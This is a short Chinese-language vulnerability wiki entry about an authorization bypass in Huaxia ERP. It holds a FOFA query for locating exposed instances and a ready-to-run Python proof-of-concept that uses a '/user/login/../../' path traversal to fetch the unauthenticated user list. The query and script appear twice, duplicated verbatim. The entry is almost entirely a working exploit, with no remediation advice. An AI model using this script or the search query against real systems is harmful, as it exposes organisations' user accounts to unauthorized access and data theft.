華夏ERP授權繞過漏洞（二）

# 華夏ERP授權繞過漏洞（二）
==FOFA==

title="华夏ERP"

==POC==

import sys,requests

def main(ip):
    url = "{ip}/user/login/../../user/getUserList?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22%22%7D¤tPage=1&pageSize=15".format(ip=ip)
    res = requests.get(url,verify=False,timeout=5)
    if res.status_code == 200:
        print("+ {ip} 访问成功\n{data}".format(ip=ip,data=res.text))
main(sys.argv[1])

python3 poc.py http://ip:port

==FOFA==

title="华夏ERP"

==POC==

import sys,requests

def main(ip):
    url = "{ip}/user/login/../../user/getUserList?search=%7B%22userName%22%3A%22%22%2C%22loginName%22%3A%22%22%7D¤tPage=1&pageSize=15".format(ip=ip)
    res = requests.get(url,verify=False,timeout=5)
    if res.status_code == 200:
        print("+ {ip} 访问成功\n{data}".format(ip=ip,data=res.text))
main(sys.argv[1])

python3 poc.py http://ip:port

==參考==
http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E5%8D%8E%E5%A4%8FERP/%E5%8D%8E%E5%A4%8FERP%E7%AC%AC%E4%BA%8C%E5%A4%84%E6%8E%88%E6%9D%83%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E.md